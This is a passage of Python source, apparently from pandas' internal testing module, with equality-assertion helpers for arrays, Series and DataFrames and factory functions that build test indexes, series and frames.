def assert_datetime_array_equal(left, right, obj="DatetimeArray", check_freq=True):
__tracebackhide__ = True
_check_isinstance(left, right, DatetimeArray)
assert_numpy_array_equal(left._data, right._data, obj=f"{obj}._data")
if check_freq:
assert_attr_equal("freq", left, right, obj=obj)
assert_attr_equal("tz", left, right, obj=obj)
def assert_timedelta_array_equal(left, right, obj="TimedeltaArray", check_freq=True):
__tracebackhide__ = True
_check_isinstance(left, right, TimedeltaArray)
assert_numpy_array_equal(left._data, right._data, obj=f"{obj}._data")
if check_freq:
assert_attr_equal("freq", left, right, obj=obj)
def raise_assert_detail(obj, message, left, right, diff=None, index_values=None):
__tracebackhide__ = True
msg = f"""{obj} are different
{message}"""
if isinstance(index_values, np.ndarray):
msg += f"\n[index]: {pprint_thing(index_values)}"
if isinstance(left, np.ndarray):
left = pprint_thing(left)
elif is_categorical_dtype(left):
left = repr(left)
if isinstance(right, np.ndarray):
right = pprint_thing(right)
elif is_categorical_dtype(right):
right = repr(right)
msg += f"""
[left]: {left}
[right]: {right}"""
if diff is not None:
msg += f"\n[diff]: {diff}"
raise AssertionError(msg)
def assert_numpy_array_equal(
left,
right,
strict_nan=False,
check_dtype=True,
err_msg=None,
check_same=None,
obj="numpy array",
index_values=None,
):
"""
Check that 'np.ndarray' is equivalent.
Parameters
----------
left, right : numpy.ndarray or iterable
The two arrays to be compared.
strict_nan : bool, default False
If True, consider NaN and None to be different.
check_dtype : bool, default True
Check dtype if both a and b are np.ndarray.
err_msg : str, default None
If provided, used as assertion message.
check_same : None|'copy'|'same', default None
Ensure left and right refer/do not refer to the same memory area.
obj : str, default 'numpy array'
Specify object name being compared, internally used to show appropriate
assertion message.
index_values : numpy.ndarray, default None
optional index (shared by both left and right), used in output.
"""
__tracebackhide__ = True
# instance validation
# Show a detailed error message when classes are different
assert_class_equal(left, right, obj=obj)
# both classes must be an np.ndarray
_check_isinstance(left, right, np.ndarray)
def _get_base(obj):
return obj.base if getattr(obj, "base", None) is not None else obj
left_base = _get_base(left)
right_base = _get_base(right)
if check_same == "same":
if left_base is not right_base:
raise AssertionError(f"{repr(left_base)} is not {repr(right_base)}")
elif check_same == "copy":
if left_base is right_base:
raise AssertionError(f"{repr(left_base)} is {repr(right_base)}")
def _raise(left, right, err_msg):
if err_msg is None:
if left.shape != right.shape:
raise_assert_detail(
obj, f"{obj} shapes are different", left.shape, right.shape
)
diff = 0
for l, r in zip(left, right):
# count up differences
if not array_equivalent(l, r, strict_nan=strict_nan):
diff += 1
diff = diff * 100.0 / left.size
msg = f"{obj} values are different ({np.round(diff, 5)} %)"
raise_assert_detail(obj, msg, left, right, index_values=index_values)
raise AssertionError(err_msg)
# compare shape and values
if not array_equivalent(left, right, strict_nan=strict_nan):
_raise(left, right, err_msg)
if check_dtype:
if isinstance(left, np.ndarray) and isinstance(right, np.ndarray):
assert_attr_equal("dtype", left, right, obj=obj)
def assert_extension_array_equal(
left,
right,
check_dtype=True,
index_values=None,
check_less_precise=no_default,
check_exact=False,
rtol: float = 1.0e-5,
atol: float = 1.0e-8,
):
"""
Check that left and right ExtensionArrays are equal.
Parameters
----------
left, right : ExtensionArray
The two arrays to compare.
check_dtype : bool, default True
Whether to check if the ExtensionArray dtypes are identical.
index_values : numpy.ndarray, default None
Optional index (shared by both left and right), used in output.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
.. deprecated:: 1.1.0
Use `rtol` and `atol` instead to define relative/absolute
tolerance, respectively. Similar to :func:`math.isclose`.
check_exact : bool, default False
Whether to compare number exactly.
rtol : float, default 1e-5
Relative tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
atol : float, default 1e-8
Absolute tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
Notes
-----
Missing values are checked separately from valid values.
A mask of missing values is computed for each and checked to match.
The remaining all-valid values are cast to object dtype and checked.
"""
if check_less_precise is not no_default:
warnings.warn(
"The 'check_less_precise' keyword in testing.assert_*_equal "
"is deprecated and will be removed in a future version. "
"You can stop passing 'check_less_precise' to silence this warning.",
FutureWarning,
stacklevel=2,
)
rtol = atol = _get_tol_from_less_precise(check_less_precise)
assert isinstance(left, ExtensionArray), "left is not an ExtensionArray"
assert isinstance(right, ExtensionArray), "right is not an ExtensionArray"
if check_dtype:
assert_attr_equal("dtype", left, right, obj="ExtensionArray")
if (
isinstance(left, DatetimeLikeArrayMixin)
and isinstance(right, DatetimeLikeArrayMixin)
and type(right) == type(left)
):
# Avoid slow object-dtype comparisons
# np.asarray for case where we have a np.MaskedArray
assert_numpy_array_equal(
np.asarray(left.asi8), np.asarray(right.asi8), index_values=index_values
)
return
left_na = np.asarray(left.isna())
right_na = np.asarray(right.isna())
assert_numpy_array_equal(
left_na, right_na, obj="ExtensionArray NA mask", index_values=index_values
)
left_valid = np.asarray(left[~left_na].astype(object))
right_valid = np.asarray(right[~right_na].astype(object))
if check_exact:
assert_numpy_array_equal(
left_valid, right_valid, obj="ExtensionArray", index_values=index_values
)
else:
_testing.assert_almost_equal(
left_valid,
right_valid,
check_dtype=check_dtype,
rtol=rtol,
atol=atol,
obj="ExtensionArray",
index_values=index_values,
)
# This could be refactored to use the NDFrame.equals method
def assert_series_equal(
left,
right,
check_dtype=True,
check_index_type="equiv",
check_series_type=True,
check_less_precise=no_default,
check_names=True,
check_exact=False,
check_datetimelike_compat=False,
check_categorical=True,
check_category_order=True,
check_freq=True,
check_flags=True,
rtol=1.0e-5,
atol=1.0e-8,
obj="Series",
):
"""
Check that left and right Series are equal.
Parameters
----------
left : Series
right : Series
check_dtype : bool, default True
Whether to check the Series dtype is identical.
check_index_type : bool or {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical.
check_series_type : bool, default True
Whether to check the Series class is identical.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
When comparing two numbers, if the first number has magnitude less
than 1e-5, we compare the two numbers directly and check whether
they are equivalent within the specified precision. Otherwise, we
compare the **ratio** of the second number to the first number and
check whether it is equivalent to 1 within the specified precision.
.. deprecated:: 1.1.0
Use `rtol` and `atol` instead to define relative/absolute
tolerance, respectively. Similar to :func:`math.isclose`.
check_names : bool, default True
Whether to check the Series and Index names attribute.
check_exact : bool, default False
Whether to compare number exactly.
check_datetimelike_compat : bool, default False
Compare datetime-like which is comparable ignoring dtype.
check_categorical : bool, default True
Whether to compare internal Categorical exactly.
check_category_order : bool, default True
Whether to compare category order of internal Categoricals.
.. versionadded:: 1.0.2
check_freq : bool, default True
Whether to check the `freq` attribute on a DatetimeIndex or TimedeltaIndex.
check_flags : bool, default True
Whether to check the `flags` attribute.
.. versionadded:: 1.2.0
rtol : float, default 1e-5
Relative tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
atol : float, default 1e-8
Absolute tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
obj : str, default 'Series'
Specify object name being compared, internally used to show appropriate
assertion message.
"""
__tracebackhide__ = True
if check_less_precise is not no_default:
warnings.warn(
"The 'check_less_precise' keyword in testing.assert_*_equal "
"is deprecated and will be removed in a future version. "
"You can stop passing 'check_less_precise' to silence this warning.",
FutureWarning,
stacklevel=2,
)
rtol = atol = _get_tol_from_less_precise(check_less_precise)
# instance validation
_check_isinstance(left, right, Series)
if check_series_type:
assert_class_equal(left, right, obj=obj)
# length comparison
if len(left) != len(right):
msg1 = f"{len(left)}, {left.index}"
msg2 = f"{len(right)}, {right.index}"
raise_assert_detail(obj, "Series length are different", msg1, msg2)
if check_flags:
assert left.flags == right.flags, f"{repr(left.flags)} != {repr(right.flags)}"
# index comparison
assert_index_equal(
left.index,
right.index,
exact=check_index_type,
check_names=check_names,
check_exact=check_exact,
check_categorical=check_categorical,
rtol=rtol,
atol=atol,
obj=f"{obj}.index",
)
if check_freq and isinstance(left.index, (pd.DatetimeIndex, pd.TimedeltaIndex)):
lidx = left.index
ridx = right.index
assert lidx.freq == ridx.freq, (lidx.freq, ridx.freq)
if check_dtype:
# We want to skip exact dtype checking when `check_categorical`
# is False. We'll still raise if only one is a `Categorical`,
# regardless of `check_categorical`
if (
is_categorical_dtype(left.dtype)
and is_categorical_dtype(right.dtype)
and not check_categorical
):
pass
else:
assert_attr_equal("dtype", left, right, obj=f"Attributes of {obj}")
if check_exact and is_numeric_dtype(left.dtype) and is_numeric_dtype(right.dtype):
# Only check exact if dtype is numeric
assert_numpy_array_equal(
left._values,
right._values,
check_dtype=check_dtype,
obj=str(obj),
index_values=np.asarray(left.index),
)
elif check_datetimelike_compat and (
needs_i8_conversion(left.dtype) or needs_i8_conversion(right.dtype)
):
# we want to check only if we have compat dtypes
# e.g. integer and M|m are NOT compat, but we can simply check
# the values in that case
# datetimelike may have different objects (e.g. datetime.datetime
# vs Timestamp) but will compare equal
if not Index(left._values).equals(Index(right._values)):
msg = (
f"[datetimelike_compat=True] {left._values} "
f"is not equal to {right._values}."
)
raise AssertionError(msg)
elif is_interval_dtype(left.dtype) and is_interval_dtype(right.dtype):
assert_interval_array_equal(left.array, right.array)
elif is_categorical_dtype(left.dtype) or is_categorical_dtype(right.dtype):
_testing.assert_almost_equal(
left._values,
right._values,
rtol=rtol,
atol=atol,
check_dtype=check_dtype,
obj=str(obj),
index_values=np.asarray(left.index),
)
elif is_extension_array_dtype(left.dtype) and is_extension_array_dtype(right.dtype):
assert_extension_array_equal(
left._values,
right._values,
check_dtype=check_dtype,
index_values=np.asarray(left.index),
)
elif needs_i8_conversion(left.dtype) or needs_i8_conversion(right.dtype):
# DatetimeArray or TimedeltaArray
assert_extension_array_equal(
left._values,
right._values,
check_dtype=check_dtype,
index_values=np.asarray(left.index),
)
else:
_testing.assert_almost_equal(
left._values,
right._values,
rtol=rtol,
atol=atol,
check_dtype=check_dtype,
obj=str(obj),
index_values=np.asarray(left.index),
)
# metadata comparison
if check_names:
assert_attr_equal("name", left, right, obj=obj)
if check_categorical:
if is_categorical_dtype(left.dtype) or is_categorical_dtype(right.dtype):
assert_categorical_equal(
left._values,
right._values,
obj=f"{obj} category",
check_category_order=check_category_order,
)
# This could be refactored to use the NDFrame.equals method
def assert_frame_equal(
left,
right,
check_dtype=True,
check_index_type="equiv",
check_column_type="equiv",
check_frame_type=True,
check_less_precise=no_default,
check_names=True,
by_blocks=False,
check_exact=False,
check_datetimelike_compat=False,
check_categorical=True,
check_like=False,
check_freq=True,
check_flags=True,
rtol=1.0e-5,
atol=1.0e-8,
obj="DataFrame",
):
"""
Check that left and right DataFrame are equal.
This function is intended to compare two DataFrames and output any
differences. Is is mostly intended for use in unit tests.
Additional parameters allow varying the strictness of the
equality checks performed.
Parameters
----------
left : DataFrame
First DataFrame to compare.
right : DataFrame
Second DataFrame to compare.
check_dtype : bool, default True
Whether to check the DataFrame dtype is identical.
check_index_type : bool or {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical.
check_column_type : bool or {'equiv'}, default 'equiv'
Whether to check the columns class, dtype and inferred_type
are identical. Is passed as the ``exact`` argument of
:func:`assert_index_equal`.
check_frame_type : bool, default True
Whether to check the DataFrame class is identical.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
When comparing two numbers, if the first number has magnitude less
than 1e-5, we compare the two numbers directly and check whether
they are equivalent within the specified precision. Otherwise, we
compare the **ratio** of the second number to the first number and
check whether it is equivalent to 1 within the specified precision.
.. deprecated:: 1.1.0
Use `rtol` and `atol` instead to define relative/absolute
tolerance, respectively. Similar to :func:`math.isclose`.
check_names : bool, default True
Whether to check that the `names` attribute for both the `index`
and `column` attributes of the DataFrame is identical.
by_blocks : bool, default False
Specify how to compare internal data. If False, compare by columns.
If True, compare by blocks.
check_exact : bool, default False
Whether to compare number exactly.
check_datetimelike_compat : bool, default False
Compare datetime-like which is comparable ignoring dtype.
check_categorical : bool, default True
Whether to compare internal Categorical exactly.
check_like : bool, default False
If True, ignore the order of index & columns.
Note: index labels must match their respective rows
(same as in columns) - same labels must be with the same data.
check_freq : bool, default True
Whether to check the `freq` attribute on a DatetimeIndex or TimedeltaIndex.
check_flags : bool, default True
Whether to check the `flags` attribute.
rtol : float, default 1e-5
Relative tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
atol : float, default 1e-8
Absolute tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
obj : str, default 'DataFrame'
Specify object name being compared, internally used to show appropriate
assertion message.
See Also
--------
assert_series_equal : Equivalent method for asserting Series equality.
DataFrame.equals : Check DataFrame equality.
Examples
--------
This example shows comparing two DataFrames that are equal
but with columns of differing dtypes.
>>> from pandas._testing import assert_frame_equal
>>> df1 = pd.DataFrame({'a': [1, 2], 'b': [3, 4]})
>>> df2 = pd.DataFrame({'a': [1, 2], 'b': [3.0, 4.0]})
df1 equals itself.
>>> assert_frame_equal(df1, df1)
df1 differs from df2 as column 'b' is of a different type.
>>> assert_frame_equal(df1, df2)
Traceback (most recent call last):
...
AssertionError: Attributes of DataFrame.iloc[:, 1] (column name="b") are different
Attribute "dtype" are different
[left]: int64
[right]: float64
Ignore differing dtypes in columns with check_dtype.
>>> assert_frame_equal(df1, df2, check_dtype=False)
"""
__tracebackhide__ = True
if check_less_precise is not no_default:
warnings.warn(
"The 'check_less_precise' keyword in testing.assert_*_equal "
"is deprecated and will be removed in a future version. "
"You can stop passing 'check_less_precise' to silence this warning.",
FutureWarning,
stacklevel=2,
)
rtol = atol = _get_tol_from_less_precise(check_less_precise)
# instance validation
_check_isinstance(left, right, DataFrame)
if check_frame_type:
assert isinstance(left, type(right))
# assert_class_equal(left, right, obj=obj)
# shape comparison
if left.shape != right.shape:
raise_assert_detail(
obj, f"{obj} shape mismatch", f"{repr(left.shape)}", f"{repr(right.shape)}"
)
if check_flags:
assert left.flags == right.flags, f"{repr(left.flags)} != {repr(right.flags)}"
# index comparison
assert_index_equal(
left.index,
right.index,
exact=check_index_type,
check_names=check_names,
check_exact=check_exact,
check_categorical=check_categorical,
check_order=not check_like,
rtol=rtol,
atol=atol,
obj=f"{obj}.index",
)
# column comparison
assert_index_equal(
left.columns,
right.columns,
exact=check_column_type,
check_names=check_names,
check_exact=check_exact,
check_categorical=check_categorical,
check_order=not check_like,
rtol=rtol,
atol=atol,
obj=f"{obj}.columns",
)
if check_like:
left, right = left.reindex_like(right), right
# compare by blocks
if by_blocks:
rblocks = right._to_dict_of_blocks()
lblocks = left._to_dict_of_blocks()
for dtype in list(set(list(lblocks.keys()) + list(rblocks.keys()))):
assert dtype in lblocks
assert dtype in rblocks
assert_frame_equal(
lblocks[dtype], rblocks[dtype], check_dtype=check_dtype, obj=obj
)
# compare by columns
else:
for i, col in enumerate(left.columns):
assert col in right
lcol = left.iloc[:, i]
rcol = right.iloc[:, i]
assert_series_equal(
lcol,
rcol,
check_dtype=check_dtype,
check_index_type=check_index_type,
check_exact=check_exact,
check_names=check_names,
check_datetimelike_compat=check_datetimelike_compat,
check_categorical=check_categorical,
check_freq=check_freq,
obj=f'{obj}.iloc[:, {i}] (column name="{col}")',
rtol=rtol,
atol=atol,
)
def assert_equal(left, right, **kwargs):
"""
Wrapper for tm.assert_*_equal to dispatch to the appropriate test function.
Parameters
----------
left, right : Index, Series, DataFrame, ExtensionArray, or np.ndarray
The two items to be compared.
**kwargs
All keyword arguments are passed through to the underlying assert method.
"""
__tracebackhide__ = True
if isinstance(left, pd.Index):
assert_index_equal(left, right, **kwargs)
if isinstance(left, (pd.DatetimeIndex, pd.TimedeltaIndex)):
assert left.freq == right.freq, (left.freq, right.freq)
elif isinstance(left, pd.Series):
assert_series_equal(left, right, **kwargs)
elif isinstance(left, pd.DataFrame):
assert_frame_equal(left, right, **kwargs)
elif isinstance(left, IntervalArray):
assert_interval_array_equal(left, right, **kwargs)
elif isinstance(left, PeriodArray):
assert_period_array_equal(left, right, **kwargs)
elif isinstance(left, DatetimeArray):
assert_datetime_array_equal(left, right, **kwargs)
elif isinstance(left, TimedeltaArray):
assert_timedelta_array_equal(left, right, **kwargs)
elif isinstance(left, ExtensionArray):
assert_extension_array_equal(left, right, **kwargs)
elif isinstance(left, np.ndarray):
assert_numpy_array_equal(left, right, **kwargs)
elif isinstance(left, str):
assert kwargs == {}
assert left == right
else:
raise NotImplementedError(type(left))
def box_expected(expected, box_cls, transpose=True):
"""
Helper function to wrap the expected output of a test in a given box_class.
Parameters
----------
expected : np.ndarray, Index, Series
box_cls : {Index, Series, DataFrame}
Returns
-------
subclass of box_cls
"""
if box_cls is pd.array:
expected = pd.array(expected)
elif box_cls is pd.Index:
expected = pd.Index(expected)
elif box_cls is pd.Series:
expected = pd.Series(expected)
elif box_cls is pd.DataFrame:
expected = pd.Series(expected).to_frame()
if transpose:
# for vector operations, we we need a DataFrame to be a single-row,
# not a single-column, in order to operate against non-DataFrame
# vectors of the same length.
expected = expected.T
elif box_cls is PeriodArray:
# the PeriodArray constructor is not as flexible as period_array
expected = period_array(expected)
elif box_cls is DatetimeArray:
expected = DatetimeArray(expected)
elif box_cls is TimedeltaArray:
expected = TimedeltaArray(expected)
elif box_cls is np.ndarray:
expected = np.array(expected)
elif box_cls is to_array:
expected = to_array(expected)
else:
raise NotImplementedError(box_cls)
return expected
def to_array(obj):
# temporary implementation until we get pd.array in place
dtype = getattr(obj, "dtype", None)
if is_period_dtype(dtype):
return period_array(obj)
elif is_datetime64_dtype(dtype) or is_datetime64tz_dtype(dtype):
return DatetimeArray._from_sequence(obj)
elif is_timedelta64_dtype(dtype):
return TimedeltaArray._from_sequence(obj)
else:
return np.array(obj)
# -----------------------------------------------------------------------------
# Sparse
def assert_sp_array_equal(left, right):
"""
Check that the left and right SparseArray are equal.
Parameters
----------
left : SparseArray
right : SparseArray
"""
_check_isinstance(left, right, pd.arrays.SparseArray)
assert_numpy_array_equal(left.sp_values, right.sp_values)
# SparseIndex comparison
assert isinstance(left.sp_index, pd._libs.sparse.SparseIndex)
assert isinstance(right.sp_index, pd._libs.sparse.SparseIndex)
left_index = left.sp_index
right_index = right.sp_index
if not left_index.equals(right_index):
raise_assert_detail(
"SparseArray.index", "index are not equal", left_index, right_index
)
else:
# Just ensure a
pass
assert_attr_equal("fill_value", left, right)
assert_attr_equal("dtype", left, right)
assert_numpy_array_equal(left.to_dense(), right.to_dense())
# -----------------------------------------------------------------------------
# Others
def assert_contains_all(iterable, dic):
for k in iterable:
assert k in dic, f"Did not contain item: {repr(k)}"
def assert_copy(iter1, iter2, **eql_kwargs):
"""
iter1, iter2: iterables that produce elements
comparable with assert_almost_equal
Checks that the elements are equal, but not
the same object. (Does not check that items
in sequences are also not the same object)
"""
for elem1, elem2 in zip(iter1, iter2):
assert_almost_equal(elem1, elem2, **eql_kwargs)
msg = (
f"Expected object {repr(type(elem1))} and object {repr(type(elem2))} to be "
"different objects, but they were the same object."
)
assert elem1 is not elem2, msg
def getCols(k):
return string.ascii_uppercase[:k]
# make index
def makeStringIndex(k=10, name=None):
return Index(rands_array(nchars=10, size=k), name=name)
def makeUnicodeIndex(k=10, name=None):
return Index(randu_array(nchars=10, size=k), name=name)
def makeCategoricalIndex(k=10, n=3, name=None, **kwargs):
""" make a length k index or n categories """
x = rands_array(nchars=4, size=n)
return CategoricalIndex(
Categorical.from_codes(np.arange(k) % n, categories=x), name=name, **kwargs
)
def makeIntervalIndex(k=10, name=None, **kwargs):
""" make a length k IntervalIndex """
x = np.linspace(0, 100, num=(k + 1))
return IntervalIndex.from_breaks(x, name=name, **kwargs)
def makeBoolIndex(k=10, name=None):
if k == 1:
return Index([True], name=name)
elif k == 2:
return Index([False, True], name=name)
return Index([False, True] + [False] * (k - 2), name=name)
def makeIntIndex(k=10, name=None):
return Index(list(range(k)), name=name)
def makeUIntIndex(k=10, name=None):
return Index([2 ** 63 + i for i in range(k)], name=name)
def makeRangeIndex(k=10, name=None, **kwargs):
return RangeIndex(0, k, 1, name=name, **kwargs)
def makeFloatIndex(k=10, name=None):
values = sorted(np.random.random_sample(k)) - np.random.random_sample(1)
return Index(values * (10 ** np.random.randint(0, 9)), name=name)
def makeDateIndex(k=10, freq="B", name=None, **kwargs):
dt = datetime(2000, 1, 1)
dr = bdate_range(dt, periods=k, freq=freq, name=name)
return DatetimeIndex(dr, name=name, **kwargs)
def makeTimedeltaIndex(k=10, freq="D", name=None, **kwargs):
return pd.timedelta_range(start="1 day", periods=k, freq=freq, name=name, **kwargs)
def makePeriodIndex(k=10, name=None, **kwargs):
dt = datetime(2000, 1, 1)
return pd.period_range(start=dt, periods=k, freq="B", name=name, **kwargs)
def makeMultiIndex(k=10, names=None, **kwargs):
return MultiIndex.from_product((("foo", "bar"), (1, 2)), names=names, **kwargs)
_names = [
"Alice",
"Bob",
"Charlie",
"Dan",
"Edith",
"Frank",
"George",
"Hannah",
"Ingrid",
"Jerry",
"Kevin",
"Laura",
"Michael",
"Norbert",
"Oliver",
"Patricia",
"Quinn",
"Ray",
"Sarah",
"Tim",
"Ursula",
"Victor",
"Wendy",
"Xavier",
"Yvonne",
"Zelda",
]
def _make_timeseries(start="2000-01-01", end="2000-12-31", freq="1D", seed=None):
"""
Make a DataFrame with a DatetimeIndex
Parameters
----------
start : str or Timestamp, default "2000-01-01"
The start of the index. Passed to date_range with `freq`.
end : str or Timestamp, default "2000-12-31"
The end of the index. Passed to date_range with `freq`.
freq : str or Freq
The frequency to use for the DatetimeIndex
seed : int, optional
The random state seed.
* name : object dtype with string names
* id : int dtype with
* x, y : float dtype
Examples
--------
>>> _make_timeseries()
id name x y
timestamp
2000-01-01 982 Frank 0.031261 0.986727
2000-01-02 1025 Edith -0.086358 -0.032920
2000-01-03 982 Edith 0.473177 0.298654
2000-01-04 1009 Sarah 0.534344 -0.750377
2000-01-05 963 Zelda -0.271573 0.054424
... ... ... ... ...
2000-12-27 980 Ingrid -0.132333 -0.422195
2000-12-28 972 Frank -0.376007 -0.298687
2000-12-29 1009 Ursula -0.865047 -0.503133
2000-12-30 1000 Hannah -0.063757 -0.507336
2000-12-31 972 Tim -0.869120 0.531685
"""
index = pd.date_range(start=start, end=end, freq=freq, name="timestamp")
n = len(index)
state = np.random.RandomState(seed)
columns = {
"name": state.choice(_names, size=n),
"id": state.poisson(1000, size=n),
"x": state.rand(n) * 2 - 1,
"y": state.rand(n) * 2 - 1,
}
df = pd.DataFrame(columns, index=index, columns=sorted(columns))
if df.index[-1] == end:
df = df.iloc[:-1]
return df
def index_subclass_makers_generator():
make_index_funcs = [
makeDateIndex,
makePeriodIndex,
makeTimedeltaIndex,
makeRangeIndex,
makeIntervalIndex,
makeCategoricalIndex,
makeMultiIndex,
]
yield from make_index_funcs
def all_timeseries_index_generator(k=10):
"""
Generator which can be iterated over to get instances of all the classes
which represent time-series.
Parameters
----------
k: length of each of the index instances
"""
make_index_funcs = [makeDateIndex, makePeriodIndex, makeTimedeltaIndex]
for make_index_func in make_index_funcs:
# pandas\_testing.py:1986: error: Cannot call function of unknown type
yield make_index_func(k=k) # type: ignore[operator]
# make series
def makeFloatSeries(name=None):
index = makeStringIndex(_N)
return Series(randn(_N), index=index, name=name)
def makeStringSeries(name=None):
index = makeStringIndex(_N)
return Series(randn(_N), index=index, name=name)
def makeObjectSeries(name=None):
data = makeStringIndex(_N)
data = Index(data, dtype=object)
index = makeStringIndex(_N)
return Series(data, index=index, name=name)
def getSeriesData():
index = makeStringIndex(_N)
return {c: Series(randn(_N), index=index) for c in getCols(_K)}
def makeTimeSeries(nper=None, freq="B", name=None):
if nper is None:
nper = _N
return Series(randn(nper), index=makeDateIndex(nper, freq=freq), name=name)
def makePeriodSeries(nper=None, name=None):
if nper is None:
nper = _N
return Series(randn(nper), index=makePeriodIndex(nper), name=name)
def getTimeSeriesData(nper=None, freq="B"):
return {c: makeTimeSeries(nper, freq) for c in getCols(_K)}
def getPeriodData(nper=None):
return {c: makePeriodSeries(nper) for c in getCols(_K)}
# make frame
def makeTimeDataFrame(nper=None, freq="B"):
data = getTimeSeriesData(nper, freq)
return DataFrame(data)
def makeDataFrame():
data = getSeriesData()
return DataFrame(data)
def getMixedTypeDict():
index = Index(["a", "b", "c", "d", "e"])
data = {
"A": [0.0, 1.0, 2.0, 3.0, 4.0],
"B": [0.0, 1.0, 0.0, 1.0, 0.0],
"C": ["foo1", "foo2", "foo3", "foo4", "foo5"],
"D": bdate_range("1/1/2009", periods=5),
}
return index, data
def makeMixedDataFrame():
return DataFrame(getMixedTypeDict()[1])
def makePeriodFrame(nper=None):
data = getPeriodData(nper)
return DataFrame(data)
def makeCustomIndex(
nentries, nlevels, prefix="#", names=False, ndupe_l=None, idx_type=None
):
"""
Create an index/multindex with given dimensions, levels, names, etc'
nentries - number of entries in index
nlevels - number of levels (> 1 produces multindex)
prefix - a string prefix for labels
names - (Optional), bool or list of strings. if True will use default
names, if false will use no names, if a list is given, the name of
each level in the index will be taken from the list.
ndupe_l - (Optional), list of ints, the number of rows for which the
label will repeated at the corresponding level, you can specify just
the first few, the rest will use the default ndupe_l of 1.
len(ndupe_l) <= nlevels.
idx_type - "i"/"f"/"s"/"u"/"dt"/"p"/"td".
If idx_type is not None, `idx_nlevels` must be 1.
"i"/"f" creates an integer/float index,
"s"/"u" creates a string/unicode index
"dt" create a datetime index.
"td" create a datetime index.
if unspecified, string labels will be generated.
"""
if ndupe_l is None:
ndupe_l = [1] * nlevels
assert is_sequence(ndupe_l) and len(ndupe_l) <= nlevels
assert names is None or names is False or names is True or len(names) is nlevels
assert idx_type is None or (
idx_type in ("i", "f", "s", "u", "dt", "p", "td") and nlevels == 1
)
if names is True:
# build default names
names = [prefix + str(i) for i in range(nlevels)]
if names is False:
# pass None to index constructor for no name
names = None
# make singleton case uniform
if isinstance(names, str) and nlevels == 1:
names = [names]
# specific 1D index type requested?
idx_func = dict(
i=makeIntIndex,
f=makeFloatIndex,
s=makeStringIndex,
u=makeUnicodeIndex,
dt=makeDateIndex,
td=makeTimedeltaIndex,
p=makePeriodIndex,
).get(idx_type)
if idx_func:
# pandas\_testing.py:2120: error: Cannot call function of unknown type
idx = idx_func(nentries) # type: ignore[operator]
# but we need to fill in the name
if names:
idx.name = names[0]
return idx
elif idx_type is not None:
raise ValueError(
f"{repr(idx_type)} is not a legal value for `idx_type`, "
"use 'i'/'f'/'s'/'u'/'dt'/'p'/'td'."
)
if len(ndupe_l) < nlevels:
ndupe_l.extend([1] * (nlevels - len(ndupe_l)))
assert len(ndupe_l) == nlevels
assert all(x > 0 for x in ndupe_l)
tuples = []
for i in range(nlevels):
def keyfunc(x):
import re
numeric_tuple = re.sub(r"[^\d_]_?", "", x).split("_")
return [int(num) for num in numeric_tuple]
# build a list of lists to create the index from
div_factor = nentries // ndupe_l[i] + 1
# pandas\_testing.py:2148: error: Need type annotation for 'cnt'
cnt = Counter() # type: ignore[var-annotated]
for j in range(div_factor):
label = f"{prefix}_l{i}_g{j}"
cnt[label] = ndupe_l[i]
# cute Counter trick
result = sorted(cnt.elements(), key=keyfunc)[:nentries]
tuples.append(result)
tuples = list(zip(*tuples))
# convert tuples to index
if nentries == 1:
# we have a single level of tuples, i.e. a regular Index
index = Index(tuples[0], name=names[0])
elif nlevels == 1:
name = None if names is None else names[0]
index = Index((x[0] for x in tuples), name=name)
else:
index = MultiIndex.from_tuples(tuples, names=names)
return index
def makeCustomDataframe(
nrows,
ncols,
c_idx_names=True,
r_idx_names=True,
c_idx_nlevels=1,
r_idx_nlevels=1,
data_gen_f=None,
c_ndupe_l=None,
r_ndupe_l=None,
dtype=None,
c_idx_type=None,
r_idx_type=None,
):
"""
Create a DataFrame using supplied parameters.
Parameters
----------
nrows, ncols - number of data rows/cols
c_idx_names, idx_names - False/True/list of strings, yields No names ,
default names or uses the provided names for the levels of the
corresponding index. You can provide a single string when
c_idx_nlevels ==1.
c_idx_nlevels - number of levels in columns index. > 1 will yield MultiIndex
r_idx_nlevels - number of levels in rows index. > 1 will yield MultiIndex
data_gen_f - a function f(row,col) which return the data value
at that position, the default generator used yields values of the form
"RxCy" based on position.
c_ndupe_l, r_ndupe_l - list of integers, determines the number
of duplicates for each label at a given level of the corresponding
index. The default `None` value produces a multiplicity of 1 across
all levels, i.e. a unique index. Will accept a partial list of length
N < idx_nlevels, for just the first N levels. If ndupe doesn't divide
nrows/ncol, the last label might have lower multiplicity.
dtype - passed to the DataFrame constructor as is, in case you wish to
have more control in conjunction with a custom `data_gen_f`
r_idx_type, c_idx_type - "i"/"f"/"s"/"u"/"dt"/"td".
If idx_type is not None, `idx_nlevels` must be 1.
"i"/"f" creates an integer/float index,
"s"/"u" creates a string/unicode index
"dt" create a datetime index.
"td" create a timedelta index.
if unspecified, string labels will be generated.
Examples
--------
# 5 row, 3 columns, default names on both, single index on both axis
>> makeCustomDataframe(5,3)
# make the data a random int between 1 and 100
>> mkdf(5,3,data_gen_f=lambda r,c:randint(1,100))
# 2-level multiindex on rows with each label duplicated
# twice on first level, default names on both axis, single
# index on both axis
>> a=makeCustomDataframe(5,3,r_idx_nlevels=2,r_ndupe_l=[2])
# DatetimeIndex on row, index with unicode labels on columns
# no names on either axis
>> a=makeCustomDataframe(5,3,c_idx_names=False,r_idx_names=False,
r_idx_type="dt",c_idx_type="u")
# 4-level multindex on rows with names provided, 2-level multindex
# on columns with default labels and default names.
>> a=makeCustomDataframe(5,3,r_idx_nlevels=4,
r_idx_names=["FEE","FI","FO","FAM"],
c_idx_nlevels=2)
>> a=mkdf(5,3,r_idx_nlevels=2,c_idx_nlevels=4)
"""
assert c_idx_nlevels > 0
assert r_idx_nlevels > 0
assert r_idx_type is None or (
